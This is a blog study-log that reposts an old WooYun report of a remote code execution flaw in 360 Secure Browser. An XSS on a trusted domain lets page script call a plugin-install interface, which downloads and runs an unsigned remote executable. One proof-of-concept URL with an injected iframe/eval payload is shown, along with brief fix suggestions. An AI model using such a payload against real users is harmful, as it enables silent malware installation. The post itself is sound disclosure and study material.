学习日志13:360安全浏览器远程代码执行漏洞

本文摘自乌云
出处:http://www.anquan.us/static/bugs/wooyun-2010-020.html
作者:结界师
缺陷编号:WooYun-2010-00020

1.漏洞基本情况:关键页面的XSS+任意插件安装+插件安装时不检验来源–>任意代码执行

2.详细说明:
360浏览器为了扩展自己的功能,在内部实现了一系列的扩展接口,并且通过web可以调用这些接口,但是在跨越安全边界时唯一的检查就是调用的来源,必须为域名a.b.c.d(假设)才可以调用这些接口。而此域名中存在XSS漏洞。从而可以使用js直接调用这些接口。某些接口如插件支持上可以下载远程的可执行程序直接执行,同时执行的时候并没有对来源应用程序做签名等认证,导致可以直接下载恶意程序执行。

3.漏洞证明:
http://a.b.c.d/v3/guide/guide_start.htm?ver=a.b.c.d&firstcheck=1&1="><iframe name=“fuck” src=“http://a.b.c.d/v3/plugins.htm” οnlοad=alert(fuck.window.eval(“Install(‘ExtWebMail’,‘a.b.c.d3’,‘360邮件通’,‘http://a.b.c.d/ExtWebmail.zip’,‘a.b.c.d’)”))>< /iframe>

其中ExtWebmail.zip里自定义的ExtWebmail.exe将会被执行

4.修复方案:
(1)修复xss(无法解决域名a.b.c.d下的其他安全问题)
(2)验证程序的来源(无法解决其他接口的问题)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值